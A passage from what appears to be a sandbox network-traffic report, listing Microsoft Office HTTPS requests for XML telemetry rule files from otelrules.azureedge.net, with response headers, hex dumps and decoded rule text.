                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        41192.168.2.54975013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:27 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 87bd4a9e-701e-0021-04a0-343d45000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142527Z-1749fc9bdbdlfqrwhC1DFWmyg800000000m000000000f84t
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        42192.168.2.54975113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:27 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 425
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142527Z-16547b76f7fdf69shC1DFWcpd00000000ks0000000003nyc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        43192.168.2.54975213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:27 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 03686f8b-301e-0099-32a0-346683000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142527Z-r178fb8d7654njfdhC1DFWd04800000002mg00000000991w
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        44192.168.2.54975313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:27 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e5a1bf30-b01e-005c-3c12-364c66000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142527Z-1749fc9bdbdlfqrwhC1DFWmyg800000000t0000000001sw7
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        45192.168.2.54975413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:27 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d6de3b9d-801e-00a0-7812-362196000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142527Z-1749fc9bdbdr6qwphC1DFW0nv400000002v00000000008mf
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:27 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        46192.168.2.54975513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 46e97820-b01e-0097-069a-364f33000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-r178fb8d765z9wvrhC1DFW1a0s00000000rg00000000cgns
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        47192.168.2.54975613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 100aec20-201e-006e-1215-2dbbe3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-16547b76f7fp46ndhC1DFW66zg0000000ks000000000g0cb
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        48192.168.2.54975713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 81840efa-e01e-0085-3c5a-32c311000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-16547b76f7f9bs6dhC1DFWt3rg0000000kng00000000mhba
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        49192.168.2.54975913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
